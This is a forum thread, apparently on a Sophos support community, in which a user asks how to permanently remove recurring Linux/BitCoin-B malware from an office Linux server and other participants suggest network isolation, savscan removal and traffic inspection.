How do I get rid of a >>> Virus 'Linux/BitCoin-B'

I have had this virus on my linux machine for some time now >>> Virus 'Linux/BitCoin-B' and I scanned and detected it and removed with sophos but it keeps coming back the next day, I have tried other products but no sucess, has anyone encoutered such a virus before on linux and successfully removed it permanently? i need help. thank you

  • Hi Richard,

    Here's some back information on Linux/Bitcoin-B. Or click for an analysis of this threat.

    Based on our KBA: Sophos Anti-Virus: How to remove malware threats, adware, or potentially unwanted applications:

    After cleaning up the threat, it comes back (the same item is re-detected). The malware is being transferred to the computer when it connects to the local network or internet. Or an undetected item of malware reloads the detected item on reboot. Initially you should isolate the computer by disabling Wi-Fi and/or removing the network cable, re-scan the computer, cleanup etc., then reboot while the computer is not connected to the network; this shows if the malware is coming from a network source or not. If the detection only occurs when connected to the network refer to the Sophos Malware Remediation Toolkit (SMaRT) process which uses the Sophos Source Of Infection (SOI) tool to reveal where network detection originate from.


  • In reply to Karlos:

    As it pertains to your Linux OS:

    1. Use savscan with the -remove option. As an example, from Terminal run: savscan -remove
    2. Run a scan to check that malware infected files were deleted.


  • In reply to Karlos:

    thank you for your answers, I tried the remove command weeks back but it still returns, i will tried your first option when i find a perfect time to shutdown the server. but the SMaRT tool seems, June 2015. from the listed tools, i guess it will have to be the SOI. i hope it solves the problem. thank you

  • In reply to Richard Orie:

    Hi Richard,

    You said it comes back every day, does it do it at the same time each day? 

    Is this a home machine or for example connected to an office network? if it is connected to a network you could disconnect it from that (keep it on the internet) and see if the detections comes back. if it doesn't then it is likely another machine on the network is actually infected and is dropping the file onto your linux box. 

    If ti does come back then do the same test but this time also disconnect it from the internet and see if it comes back, if not then there must be something hiding on your machine that is downloading it each day. The SOI tool you referenced would be good for this except for it is a Windows command prompt tool. 

    If you narrow it down to coming from the internet you could try and spot the network traffic using a tool such as Wireshark, this may give you an address you could block or point in the direction of what is making the connection.

  • In reply to PeterM:

    well this is a linux server machine connected on a office network, I had similar issue on a windows server and it was easier to solver unlike the linux machine. I guess SMaRT will not be able to help in this case, I will try scanning again while the machine is offline. thank you